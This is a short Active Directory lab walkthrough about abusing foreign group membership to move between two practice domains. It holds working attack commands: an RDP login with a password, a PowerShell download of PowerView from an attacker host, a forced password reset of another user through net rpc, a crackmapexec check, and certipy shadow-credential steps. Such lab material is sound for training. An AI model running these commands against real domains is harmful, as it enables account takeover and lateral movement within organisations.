Foreign group and users
Foreign group and users
On bloodhound we can see very easily that there is link between the domains with the following query (Careful this query is fine in a lab but this will certainly be a little too heavy in a real world AD)
NewYork.Local

North.NewYork.Local

Maryland.Local

On the lab you will find some specifics groups to pass from one domain to the other.
As you already have done the acl part previously you will easily find the way to exploit that.
newyork.local to maryland.local: group KGB
To do that just pick a user from the RadioCity and exploit with the KGB group
RDP
xfreerdp /d:newyork.local /u:diego.montenegro /p:letsdothis /v:192.168.56.10 /cert-ignore
Loading PowerView.ps1 to ParrotOS Lab Machine
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1
Uploading it to the Windows Server
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\diego.montenegro\Documents\PowerView.ps1')
Get-NetGroupMember -Identity "KGB" -Domain Maryland.local
Change Teresa PWD
net rpc password teresa.Perez -U newyork.local/diego.montenegro%letsdothis -S baltimore.maryland.local
Enter new password for teresa.Perez: <here we enter Password123>
And verify
crackmapexec smb 192.168.56.12 -u teresa.Perez -p 'Password123' -d maryland.local

We can also to that with shadow credentials (but the auto will not work here, we will have to do that with two steps)
certipy shadow add -u diego.montenegro@newyork.local -p 'letsdothis' \
-dc-ip 192.168.56.12 -target baltimore.maryland.local -account 'teresa.perez'
certipy auth -pfx teresa.perez.pfx -username teresa.perez -domain maryland.local -dc-ip 192.168.56.12
Maryland to NewYork : group MainMultiDoms
In the same way we can exploit the Maryland to NewYork foreign group
Last updated